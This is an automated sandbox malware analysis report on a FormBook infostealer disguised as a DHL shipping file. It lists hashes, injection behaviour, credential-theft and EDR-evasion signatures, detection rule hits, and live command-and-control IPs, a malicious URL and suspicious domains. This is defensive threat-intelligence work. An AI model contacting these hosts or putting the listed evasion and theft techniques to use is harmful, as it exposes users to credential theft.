Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL_734825510.exe

Overview

General Information

Sample name:DHL_734825510.exe
Analysis ID:1570251
MD5:3aae187307a535df90ed8f9faa0341d2
SHA1:c3288325246f98f3e388795f7d34d4ce4a8adb08
SHA256:00c2d72b6a63a14fbe34e3fb19fad396213bb9be21ff695df527a676b866c8b2
Tags:DHLexeFormbookuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • DHL_734825510.exe (PID: 6540 cmdline: "C:\Users\user\Desktop\DHL_734825510.exe" MD5: 3AAE187307A535DF90ED8F9FAA0341D2)
    • svchost.exe (PID: 6624 cmdline: "C:\Users\user\Desktop\DHL_734825510.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • RsbLJIqaDYs.exe (PID: 64 cmdline: "C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • regini.exe (PID: 6900 cmdline: "C:\Windows\SysWOW64\regini.exe" MD5: C99C3BB423097FCF4990539FC1ED60E3)
          • RsbLJIqaDYs.exe (PID: 5356 cmdline: "C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7116 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2661754226.00000000094A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.4817215327.0000000002DA0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.4817376568.0000000002DF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DHL_734825510.exe", CommandLine: "C:\Users\user\Desktop\DHL_734825510.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_734825510.exe", ParentImage: C:\Users\user\Desktop\DHL_734825510.exe, ParentProcessId: 6540, ParentProcessName: DHL_734825510.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL_734825510.exe", ProcessId: 6624, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\DHL_734825510.exe", CommandLine: "C:\Users\user\Desktop\DHL_734825510.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_734825510.exe", ParentImage: C:\Users\user\Desktop\DHL_734825510.exe, ParentProcessId: 6540, ParentProcessName: DHL_734825510.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL_734825510.exe", ProcessId: 6624, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-06T17:36:06.305032+010020507451Malware Command and Control Activity Detected192.168.2.124971513.248.169.4880TCP
                2024-12-06T17:36:31.168424+010020507451Malware Command and Control Activity Detected192.168.2.124972013.248.169.4880TCP
                2024-12-06T17:36:46.399948+010020507451Malware Command and Control Activity Detected192.168.2.124972484.32.84.3280TCP
                2024-12-06T17:37:00.952886+010020507451Malware Command and Control Activity Detected192.168.2.124973484.32.84.3280TCP
                2024-12-06T17:37:16.122569+010020507451Malware Command and Control Activity Detected192.168.2.1249772209.74.77.10780TCP
                2024-12-06T17:37:31.396749+010020507451Malware Command and Control Activity Detected192.168.2.124980938.47.207.16480TCP
                2024-12-06T17:37:46.782408+010020507451Malware Command and Control Activity Detected192.168.2.1249849208.115.225.22080TCP
                2024-12-06T17:38:11.822163+010020507451Malware Command and Control Activity Detected192.168.2.1249908172.67.162.3980TCP
                2024-12-06T17:38:26.939013+010020507451Malware Command and Control Activity Detected192.168.2.1249948199.59.243.22780TCP
                2024-12-06T17:38:41.949933+010020507451Malware Command and Control Activity Detected192.168.2.1249985199.59.243.22780TCP
                2024-12-06T17:38:56.546963+010020507451Malware Command and Control Activity Detected192.168.2.1250021104.21.90.13780TCP
                2024-12-06T17:39:11.802745+010020507451Malware Command and Control Activity Detected192.168.2.1250025108.179.253.19780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-06T17:36:06.305032+010028554651A Network Trojan was detected192.168.2.124971513.248.169.4880TCP
                2024-12-06T17:36:31.168424+010028554651A Network Trojan was detected192.168.2.124972013.248.169.4880TCP
                2024-12-06T17:36:46.399948+010028554651A Network Trojan was detected192.168.2.124972484.32.84.3280TCP
                2024-12-06T17:37:00.952886+010028554651A Network Trojan was detected192.168.2.124973484.32.84.3280TCP
                2024-12-06T17:37:16.122569+010028554651A Network Trojan was detected192.168.2.1249772209.74.77.10780TCP
                2024-12-06T17:37:31.396749+010028554651A Network Trojan was detected192.168.2.124980938.47.207.16480TCP
                2024-12-06T17:37:46.782408+010028554651A Network Trojan was detected192.168.2.1249849208.115.225.22080TCP
                2024-12-06T17:38:11.822163+010028554651A Network Trojan was detected192.168.2.1249908172.67.162.3980TCP
                2024-12-06T17:38:26.939013+010028554651A Network Trojan was detected192.168.2.1249948199.59.243.22780TCP
                2024-12-06T17:38:41.949933+010028554651A Network Trojan was detected192.168.2.1249985199.59.243.22780TCP
                2024-12-06T17:38:56.546963+010028554651A Network Trojan was detected192.168.2.1250021104.21.90.13780TCP
                2024-12-06T17:39:11.802745+010028554651A Network Trojan was detected192.168.2.1250025108.179.253.19780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-06T17:36:23.170513+010028554641A Network Trojan was detected192.168.2.124971713.248.169.4880TCP
                2024-12-06T17:36:25.846030+010028554641A Network Trojan was detected192.168.2.124971813.248.169.4880TCP
                2024-12-06T17:36:28.509256+010028554641A Network Trojan was detected192.168.2.124971913.248.169.4880TCP
                2024-12-06T17:36:37.927439+010028554641A Network Trojan was detected192.168.2.124972184.32.84.3280TCP
                2024-12-06T17:36:41.074454+010028554641A Network Trojan was detected192.168.2.124972284.32.84.3280TCP
                2024-12-06T17:36:43.742873+010028554641A Network Trojan was detected192.168.2.124972384.32.84.3280TCP
                2024-12-06T17:36:52.946445+010028554641A Network Trojan was detected192.168.2.124972584.32.84.3280TCP
                2024-12-06T17:36:55.615860+010028554641A Network Trojan was detected192.168.2.124972684.32.84.3280TCP
                2024-12-06T17:36:58.286505+010028554641A Network Trojan was detected192.168.2.124972884.32.84.3280TCP
                2024-12-06T17:37:08.102346+010028554641A Network Trojan was detected192.168.2.1249750209.74.77.10780TCP
                2024-12-06T17:37:10.857515+010028554641A Network Trojan was detected192.168.2.1249756209.74.77.10780TCP
                2024-12-06T17:37:13.493688+010028554641A Network Trojan was detected192.168.2.1249767209.74.77.10780TCP
                2024-12-06T17:37:23.333261+010028554641A Network Trojan was detected192.168.2.124978938.47.207.16480TCP
                2024-12-06T17:37:26.005118+010028554641A Network Trojan was detected192.168.2.124979438.47.207.16480TCP
                2024-12-06T17:37:28.676989+010028554641A Network Trojan was detected192.168.2.124980038.47.207.16480TCP
                2024-12-06T17:37:38.720332+010028554641A Network Trojan was detected192.168.2.1249827208.115.225.22080TCP
                2024-12-06T17:37:41.387774+010028554641A Network Trojan was detected192.168.2.1249833208.115.225.22080TCP
                2024-12-06T17:37:44.066273+010028554641A Network Trojan was detected192.168.2.1249843208.115.225.22080TCP
                2024-12-06T17:38:02.677034+010028554641A Network Trojan was detected192.168.2.1249886172.67.162.3980TCP
                2024-12-06T17:38:05.348890+010028554641A Network Trojan was detected192.168.2.1249892172.67.162.3980TCP
                2024-12-06T17:38:08.020986+010028554641A Network Trojan was detected192.168.2.1249898172.67.162.3980TCP
                2024-12-06T17:38:18.925603+010028554641A Network Trojan was detected192.168.2.1249929199.59.243.22780TCP
                2024-12-06T17:38:21.596177+010028554641A Network Trojan was detected192.168.2.1249935199.59.243.22780TCP
                2024-12-06T17:38:24.271865+010028554641A Network Trojan was detected192.168.2.1249941199.59.243.22780TCP
                2024-12-06T17:38:33.912697+010028554641A Network Trojan was detected192.168.2.1249964199.59.243.22780TCP
                2024-12-06T17:38:36.585064+010028554641A Network Trojan was detected192.168.2.1249973199.59.243.22780TCP
                2024-12-06T17:38:39.269011+010028554641A Network Trojan was detected192.168.2.1249979199.59.243.22780TCP
                2024-12-06T17:38:48.529809+010028554641A Network Trojan was detected192.168.2.1250001104.21.90.13780TCP
                2024-12-06T17:38:51.231199+010028554641A Network Trojan was detected192.168.2.1250007104.21.90.13780TCP
                2024-12-06T17:38:53.956005+010028554641A Network Trojan was detected192.168.2.1250016104.21.90.13780TCP
                2024-12-06T17:39:03.765359+010028554641A Network Trojan was detected192.168.2.1250022108.179.253.19780TCP
                2024-12-06T17:39:06.469988+010028554641A Network Trojan was detected192.168.2.1250023108.179.253.19780TCP
                2024-12-06T17:39:09.095603+010028554641A Network Trojan was detected192.168.2.1250024108.179.253.19780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-06T17:36:41.074454+010028563181A Network Trojan was detected192.168.2.124972284.32.84.3280TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.appsolucao.shop/8mlm/Avira URL Cloud: Label: malware
                Source: http://www.appsolucao.shop/8mlm/?BHptZ6F=Dou+d174n903Q5s8eGVlbncTBC0Rpufru8Nex+2NzpzCLkW84PIBEnPU/VIOuudaHO13J+F+WsJAELWMIa4GeHkI0XjsMpOmPR3vOajhWYhkzVz3w31CV1o=&RZ=0nkpmZbx9Z4P2Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: DHL_734825510.exeReversingLabs: Detection: 42%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2661754226.00000000094A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4817215327.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4817376568.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4817056266.0000000005200000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2656279373.00000000065E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: DHL_734825510.exeJoe Sandbox ML: detected
                Source: DHL_734825510.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RsbLJIqaDYs.exe, 00000005.00000002.4816396248.0000000000CBE000.00000002.00000001.01000000.00000005.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4816788031.0000000000CBE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000002.00000003.2560509259.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558405419.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2655884928.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000006.00000003.2668011132.0000000002E5A000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000003.2665704256.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000002.00000003.2560509259.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558405419.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2655884928.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 00000006.00000003.2668011132.0000000002E5A000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000003.2665704256.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: svchost.exe, 00000002.00000003.2623797499.0000000003424000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2623732089.000000000341B000.00000004.00000020.00020000.00000000.sdmp, RsbLJIqaDYs.exe, 00000005.00000002.4816604781.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: regini.exe, 00000006.00000002.4819056247.000000000362C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000006.00000002.4815970575.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.0000000002D0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3062068304.00000000182BC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: regini.exe, 00000006.00000002.4819056247.000000000362C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000006.00000002.4815970575.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.0000000002D0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3062068304.00000000182BC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: regini.pdb source: svchost.exe, 00000002.00000003.2623797499.0000000003424000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2623732089.000000000341B000.00000004.00000020.00020000.00000000.sdmp, RsbLJIqaDYs.exe, 00000005.00000002.4816604781.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028CC7B0 FindFirstFileW,FindNextFileW,FindClose,6_2_028CC7B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then xor eax, eax6_2_028B9F10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then pop edi6_2_028BE37A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then mov ebx, 00000004h6_2_02EE0525

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49722 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.12:49722 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49728 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49726 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49719 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49725 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49718 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49717 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49715 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49715 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49756 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49734 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49720 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49734 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49772 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49772 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49750 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49767 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49720 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49723 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49789 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49724 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49724 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49721 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49794 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49800 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49809 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49809 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49833 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49827 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49843 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49849 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49849 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49886 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49892 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49898 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49908 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49908 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49941 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49929 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49948 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49948 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49935 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49964 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49973 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49979 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:50001 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49985 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49985 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:50007 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:50023 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:50022 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:50025 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:50016 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:50025 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:50024 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:50021 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:50021 -> 104.21.90.137:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.egldfi.xyz
                Source: DNS query: www.egyshare.xyz
                Source: DNS query: www.dating-apps-az-dn5.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 209.74.77.107 209.74.77.107
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
